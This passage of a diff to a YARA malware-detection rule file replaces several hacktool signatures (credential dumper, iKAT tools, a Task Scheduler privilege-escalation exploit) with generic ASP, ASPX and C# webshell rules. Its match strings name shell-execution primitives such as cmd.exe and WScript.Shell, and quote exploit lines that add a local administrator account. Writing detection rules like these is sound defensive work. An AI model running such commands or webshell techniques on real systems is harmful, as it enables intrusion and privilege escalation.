+		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
+		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
+		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
+		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
+		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
+		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
+		$asp_multi_payload_one2 = "addcode" fullword wide ascii
+		$asp_multi_payload_one3 = /\.run\b/ wide ascii
+		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
+		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
+		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
+		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
+		$asp_multi_payload_three2 = "Process" fullword wide ascii
+		$asp_multi_payload_three3 = ".Start" wide ascii
+		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
+		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
+		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
+		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
+		$asp_multi_payload_five2 = ".Start" nocase wide ascii
+		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
+		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
+		$asp_always_write1 = /\.write/ nocase wide ascii
+		$asp_always_write2 = /\.swrite/ nocase wide ascii
+		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
+		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
+		$asp_cr_write1 = "CreateObject(" nocase wide ascii
+		$asp_cr_write2 = "CreateObject (" nocase wide ascii
+		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
+		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* )
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and not 1 of ( $fp* ) and not ( uint16( 0 ) == 0x5a4d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( filesize < 700 and ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) )
 }
-rule SIGNATURE_BASE_WCE_Modified_1_1014
+rule SIGNATURE_BASE_WEBSHELL_ASP_Generic : FILE
 {
 	meta:
-		description = "Modified (packed) version of Windows Credential Editor"
-		author = "Florian Roth (Nextron Systems)"
-		id = "536d1a7f-bda1-5c22-bf72-a177468e7c42"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L738-L752"
+		description = "Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0904cefb-6e0f-5e5f-9986-cf83d409ce46"
+		date = "2021-03-07"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L4406-L4705"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354"
-		logic_hash = "f094d635aabea9b9101fad3d0d23ad37692317ae5b4f636296ee612752c4421f"
-		score = 70
-		quality = 85
-		tags = ""
+		hash = "a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75"
+		hash = "4cf6fbad0411b7d33e38075f5e00d4c8ae9ce2f6f53967729974d004a183b25c"
+		hash = "a91320483df0178eb3cafea830c1bd94585fc896"
+		hash = "f3398832f697e3db91c3da71a8e775ebf66c7e73"
+		logic_hash = "f3375e8162b0a108887aed95fa67546f324eb8e15faee92c33dc3031688620e0"
+		score = 60
+		quality = -126
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "LSASS.EXE" fullword ascii
-		$s1 = "_CREDS" ascii
-		$s9 = "Using WCE " ascii
+		$asp_much_sus7 = "Web Shell" nocase
+		$asp_much_sus8 = "WebShell" nocase
+		$asp_much_sus3 = "hidded shell"
+		$asp_much_sus4 = "WScript.Shell.1" nocase
+		$asp_much_sus5 = "AspExec"
+		$asp_much_sus14 = "\\pcAnywhere\\" nocase
+		$asp_much_sus15 = "antivirus" nocase
+		$asp_much_sus16 = "McAfee" nocase
+		$asp_much_sus17 = "nishang"
+		$asp_much_sus18 = "\"unsafe" fullword wide ascii
+		$asp_much_sus19 = "'unsafe" fullword wide ascii
+		$asp_much_sus28 = "exploit" fullword wide ascii
+		$asp_much_sus30 = "TVqQAAMAAA" wide ascii
+		$asp_much_sus31 = "HACKED" fullword wide ascii
+		$asp_much_sus32 = "hacked" fullword wide ascii
+		$asp_much_sus33 = "hacker" wide ascii
+		$asp_much_sus34 = "grayhat" nocase wide ascii
+		$asp_much_sus35 = "Microsoft FrontPage" wide ascii
+		$asp_much_sus36 = "Rootkit" wide ascii
+		$asp_much_sus37 = "rootkit" wide ascii
+		$asp_much_sus38 = "/*-/*-*/" wide ascii
+		$asp_much_sus39 = "u\"+\"n\"+\"s" wide ascii
+		$asp_much_sus40 = "\"e\"+\"v" wide ascii
+		$asp_much_sus41 = "a\"+\"l\"" wide ascii
+		$asp_much_sus42 = "\"+\"(\"+\"" wide ascii
+		$asp_much_sus43 = "q\"+\"u\"" wide ascii
+		$asp_much_sus44 = "\"u\"+\"e" wide ascii
+		$asp_much_sus45 = "/*//*/" wide ascii
+		$asp_much_sus46 = "(\"/*/\"" wide ascii
+		$asp_much_sus47 = "eval(eval(" wide ascii
+		$asp_much_sus48 = "Shell.Users" wide ascii
+		$asp_much_sus49 = "PasswordType=Regular" wide ascii
+		$asp_much_sus50 = "-Expire=0" wide ascii
+		$asp_much_sus51 = "sh\"&\"el" wide ascii
+		$asp_gen_sus1 = /:\s{0,20}eval}/ nocase wide ascii
+		$asp_gen_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
+		$asp_gen_sus6 = "self.delete"
+		$asp_gen_sus9 = "\"cmd /c" nocase
+		$asp_gen_sus10 = "\"cmd\"" nocase
+		$asp_gen_sus11 = "\"cmd.exe" nocase
+		$asp_gen_sus12 = "%comspec%" wide ascii
+		$asp_gen_sus13 = "%COMSPEC%" wide ascii
+		$asp_gen_sus18 = "Hklm.GetValueNames();" nocase
+		$asp_gen_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
+		$asp_gen_sus21 = "\"upload\"" wide ascii
+		$asp_gen_sus22 = "\"Upload\"" wide ascii
+		$asp_gen_sus25 = "shell_" wide ascii
+		$asp_gen_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
+		$asp_gen_sus30 = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
+		$asp_gen_sus31 = "serv-u" wide ascii
+		$asp_gen_sus32 = "Serv-u" wide ascii
+		$asp_gen_sus33 = "Army" fullword wide ascii
+		$asp_slightly_sus1 = "<pre>" wide ascii
+		$asp_slightly_sus2 = "<PRE>" wide ascii
+		$asp_gen_obf1 = "\"+\"" wide ascii
+		$fp1 = "DataBinder.Eval"
+		$fp2 = "B2BTools"
+		$fp3 = "<b>Failed to execute cache update. See the log file for more information" ascii
+		$fp4 = "Microsoft. All rights reserved."
+		$fp5 = "\"unsafe\"," ascii wide
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
+		$asp_payload0 = "eval_r" fullword nocase wide ascii
+		$asp_payload1 = /\beval\s/ nocase wide ascii
+		$asp_payload2 = /\beval\(/ nocase wide ascii
+		$asp_payload3 = /\beval\"\"/ nocase wide ascii
+		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
+		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
+		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
+		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
+		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
+		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
+		$asp_multi_payload_one2 = "addcode" fullword wide ascii
+		$asp_multi_payload_one3 = /\.run\b/ wide ascii
+		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
+		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
+		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
+		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
+		$asp_multi_payload_three2 = "Process" fullword wide ascii
+		$asp_multi_payload_three3 = "Start" fullword wide ascii
+		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
+		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
+		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
+		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
+		$asp_multi_payload_five2 = ".Start" nocase wide ascii
+		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
+		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
+		$asp_always_write1 = /\.write/ nocase wide ascii
+		$asp_always_write2 = /\.swrite/ nocase wide ascii
+		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
+		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
+		$asp_cr_write1 = "CreateObject(" nocase wide ascii
+		$asp_cr_write2 = "CreateObject (" nocase wide ascii
+		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
+		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
+		$tagasp_capa_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_capa_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_capa_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_capa_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_capa_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
 
 	condition:
-		all of them
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and not ( uint16( 0 ) == 0x5a4d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) and not any of ( $fp* ) and ( ( filesize < 3KB and ( 1 of ( $asp_slightly_sus* ) ) ) or ( filesize < 25KB and ( 1 of ( $asp_much_sus* ) or 1 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 2 ) ) ) or ( filesize < 50KB and ( 1 of ( $asp_much_sus* ) or 3 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 6 ) ) ) or ( filesize < 150KB and ( 1 of ( $asp_much_sus* ) or 4 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 6 ) or ( ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) and ( 1 of ( $asp_much_sus* ) or 2 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 3 ) ) ) ) ) or ( filesize < 100KB and ( any of ( $tagasp_capa_classid* ) ) ) )
 }
-rule SIGNATURE_BASE_Ikat_Wmi_Rundll : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Generic_Registry_Reader : FILE
 {
 	meta:
-		description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e3d80c95-d333-53cf-8165-b3a1e66ed00d"
-		date = "2014-05-11"
-		modified = "2025-04-14"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L773-L794"
+		description = "Generic ASP webshell which reads the registry (might look for passwords, license keys, database settings, general recon, ..."
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "02d6f95f-1801-5fb0-8ab8-92176cf2fdd7"
+		date = "2021-03-14"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L4707-L4854"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "97c4d4e6a644eed5aa12437805e39213e494d120"
-		logic_hash = "b857e17c790a97468ae69c8cbec6474ee38bea25bb04520516a2603996d4bd41"
-		score = 65
-		quality = 85
+		hash = "4d53416398a89aef3a39f63338a7c1bf2d3fcda4"
+		hash = "f85cf490d7eb4484b415bea08b7e24742704bdda"
+		hash = "898ebfa1757dcbbecb2afcdab1560d72ae6940de"
+		logic_hash = "515bff52bebaad45481202ff934f8d1cbb79c27ccf47ca811077acacb7a47f13"
+		score = 50
+		quality = -53
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "This operating system is not supported." fullword ascii
-		$s1 = "Error!" fullword ascii
-		$s2 = "Win32 only!" fullword ascii
-		$s3 = "COMCTL32.dll" fullword ascii
-		$s4 = "[LordPE]" ascii
-		$s5 = "CRTDLL.dll" fullword ascii
-		$s6 = "VBScript" fullword ascii
-		$s7 = "CoUninitialize" fullword ascii
+		$asp_reg2 = "LocalMachine" fullword wide ascii
+		$asp_reg3 = "ClassesRoot" fullword wide ascii
+		$asp_reg4 = "CurrentUser" fullword wide ascii
+		$asp_reg5 = "Users" fullword wide ascii
+		$asp_reg6 = "CurrentConfig" fullword wide ascii
+		$asp_reg7 = "Microsoft.Win32" fullword wide ascii
+		$asp_reg8 = "OpenSubKey" fullword wide ascii
+		$sus1 = "shell" fullword nocase wide ascii
+		$sus2 = "cmd.exe" fullword wide ascii
+		$sus3 = "<form " wide ascii
+		$sus4 = "<table " wide ascii
+		$sus5 = "System.Security.SecurityException" wide ascii
+		$fp1 = "Avira Operations GmbH" wide
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
 
 	condition:
-		all of them and filesize < 15KB
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and all of ( $asp_reg* ) and any of ( $sus* ) and not any of ( $fp* ) and ( filesize < 10KB or ( filesize < 150KB and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) ) )
 }
-rule SIGNATURE_BASE_Ikat_Revelations
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Regeorg_CSHARP : FILE
 {
 	meta:
-		description = "iKAT hack tool showing the content of password fields - file revelations.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c5ef2c2a-c9c0-5c3a-bbcc-0b0949527850"
-		date = "2014-05-11"
-		modified = "2025-04-14"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L796-L813"
+		description = "Webshell regeorg aspx c# version"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0a53d368-5f1b-55b7-b08f-36b0f8c5612f"
+		date = "2021-01-11"
+		modified = "2023-07-05"
+		reference = "https://github.com/sensepost/reGeorg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L4856-L4966"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c4e217a8f2a2433297961561c5926cbd522f7996"
-		logic_hash = "0f3aa9e784beb7de8b560ecde8cc06d49e07f5e4ea4acb233ec9ac007179d7a3"
+		hash = "c1f43b7cf46ba12cfc1357b17e4f5af408740af7ae70572c9cf988ac50260ce1"
+		hash = "479c1e1f1c263abe339de8be99806c733da4e8c1"
+		hash = "38a1f1fc4e30c0b4ad6e7f0e1df5a92a7d05020b"
+		hash = "e54f1a3eab740201feda235835fc0aa2e0c44ba9"
+		hash = "aea0999c6e5952ec04bf9ee717469250cddf8a6f"
+		logic_hash = "0c68f5955df2e75c3b5b4f1c6398fd57add1f64bfb3d46ccebf1c6767f5d2eb1"
 		score = 75
-		quality = 60
-		tags = ""
+		quality = -7
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "The RevelationHelper.DLL file is corrupt or missing." fullword ascii
-		$s8 = "BETAsupport@snadboy.com" fullword wide
-		$s9 = "support@snadboy.com" fullword wide
-		$s14 = "RevelationHelper.dll" fullword ascii
+		$input_sa1 = "Request.QueryString.Get" fullword nocase wide ascii
+		$input_sa2 = "Request.Headers.Get" fullword nocase wide ascii
+		$sa1 = "AddressFamily.InterNetwork" fullword nocase wide ascii
+		$sa2 = "Response.AddHeader" fullword nocase wide ascii
+		$sa3 = "Request.InputStream.Read" nocase wide ascii
+		$sa4 = "Response.BinaryWrite" nocase wide ascii
+		$sa5 = "Socket" nocase wide ascii
+		$georg = "Response.Write(\"Georg says, 'All seems fine'\")"
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
 
 	condition:
-		all of them
+		filesize < 300KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( $georg or ( all of ( $sa* ) and any of ( $input_sa* ) ) )
 }
-rule SIGNATURE_BASE_Ikat_Priv_Esc_Tasksch
+rule SIGNATURE_BASE_WEBSHELL_CSHARP_Generic : FILE
 {
 	meta:
-		description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista."
-		author = "Florian Roth (Nextron Systems)"
-		id = "0786b313-3154-536b-b7eb-c4d8444a309f"
-		date = "2014-05-11"
-		modified = "2025-04-14"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L815-L841"
+		description = "Webshell in c#"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "6d38a6b0-b1d2-51b0-9239-319f1fea7cae"
+		date = "2021-01-11"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L4968-L5076"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b"
-		logic_hash = "6d0f755a758aaac4328f5f4343b424c03c2751ddad6a1dbe7c0332171c027945"
+		hash = "b6721683aadc4b4eba4f081f2bc6bc57adfc0e378f6d80e2bfa0b1e3e57c85c7"
+		hash = "4b365fc9ddc8b247a12f4648cd5c91ee65e33fae"
+		hash = "019eb61a6b5046502808fb5ab2925be65c0539b4"
+		hash = "620ee444517df8e28f95e4046cd7509ac86cd514"
+		hash = "a91320483df0178eb3cafea830c1bd94585fc896"
+		logic_hash = "fb367b79c8ed4a61618594db903cf3d70524685d7710d243163958ecb47634aa"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = -5
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" fullword ascii
-		$s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" fullword ascii
-		$s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" fullword ascii
-		$s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" fullword ascii
-		$s7 = "a.WriteLine (\"net user /add ikat ikat\")" fullword ascii
-		$s8 = "a.WriteLine (\"cmd.exe\")" fullword ascii
-		$s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" fullword ascii
-		$s10 = "For n = 1 To (Len (hexXML) - 1) step 2" fullword ascii
-		$s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" fullword ascii
-		$s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" fullword ascii
-		$s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii
-		$s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" fullword ascii
-		$s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" fullword ascii
+		$input_http = "Request." nocase wide ascii
+		$input_form1 = "<asp:" nocase wide ascii
+		$input_form2 = ".text" nocase wide ascii
+		$exec_proc1 = "new Process" nocase wide ascii
